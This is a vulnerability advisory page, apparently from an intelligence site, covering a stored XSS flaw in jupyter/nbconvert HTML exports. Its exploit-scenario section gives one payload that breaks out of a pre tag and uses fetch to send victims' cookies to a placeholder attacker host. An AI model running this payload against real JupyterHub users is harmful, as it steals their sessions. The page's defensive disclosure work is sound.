Severity by source
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
PR:L reflects required notebook write access; UI:R reflects victim must view HTML export; S:C captures cross-browser-session impact; no availability impact applies.
Primary rating from Vendor (huntr_ai).
CVSS VectorVendor: huntr_ai
CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Lifecycle Timeline
1DescriptionCVE.org
A vulnerability in jupyter/nbconvert versions <= 7.17.0 allows for Cross-site Scripting (XSS) via unsanitized text/vnd.mermaid output in HTML exports. The data_mermaid block in share/templates/lab/base.html.j2 renders text/vnd.mermaid cell output directly into HTML without escaping, enabling attackers to inject arbitrary HTML/JavaScript by breaking out of the <pre> tag. This vulnerability impacts any server using nbconvert to render notebooks as HTML, allowing attackers to execute arbitrary JavaScript in the context of users viewing the HTML export.
AnalysisAI
Cross-site scripting in jupyter/nbconvert versions 7.17.0 and earlier allows any user with notebook write access to inject and execute arbitrary JavaScript in the browsers of users who view HTML-exported notebooks. The flaw stems from the data_mermaid rendering block in share/templates/lab/base.html.j2, which outputs text/vnd.mermaid cell content directly into HTML without escaping, enabling tag breakout from the enclosing <pre> element. …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires two concrete conditions: first, the attacker must have low-privilege write access to a Jupyter notebook - sufficient to set a cell's output MIME type to `text/vnd.mermaid` with attacker-controlled content (PR:L); second, a victim with a browser session must actively open or view an HTML file produced by nbconvert from that notebook (UI:R). … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 3.0 base score of 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N reflects a stored-XSS pattern that is exploitable at low complexity but requires two preconditions: the attacker must hold low-privilege access to author or modify a notebook (PR:L), and a victim must actively render and view the HTML export (UI:R). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker with contributor access to a shared JupyterHub instance authors a notebook cell with `text/vnd.mermaid` output containing a payload such as `</pre><img src=x onerror=fetch('https://attacker.example/c?c='+document.cookie)>`. When a JupyterHub administrator or data reviewer exports the notebook to HTML using nbconvert and opens the resulting file in their browser, the injected script fires and exfiltrates the viewer's session cookies or JupyterHub authentication tokens to the attacker's server. … |
| Remediation | Upgrade jupyter/nbconvert to any version released after 7.17.0 once a patched release is available; no exact fix version has been confirmed from the available references, so monitor the nbconvert PyPI release page and the Huntr advisory at https://huntr.com/bounties/47570290-3b26-4477-8cfa-fdef7db5aefe for the confirmed patch release. … Detailed patch versions, workarounds, and compensating controls in full report. |
Threat intelligence, references, and detailed analysis are available after sign-in.
More in Jupyter Jupyter
View allSame weakness CWE-79 – Cross-site Scripting (XSS)
View allVendor StatusVendor
SUSE
Severity: ModerateShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-39642
GHSA-9754-6rhw-gj3h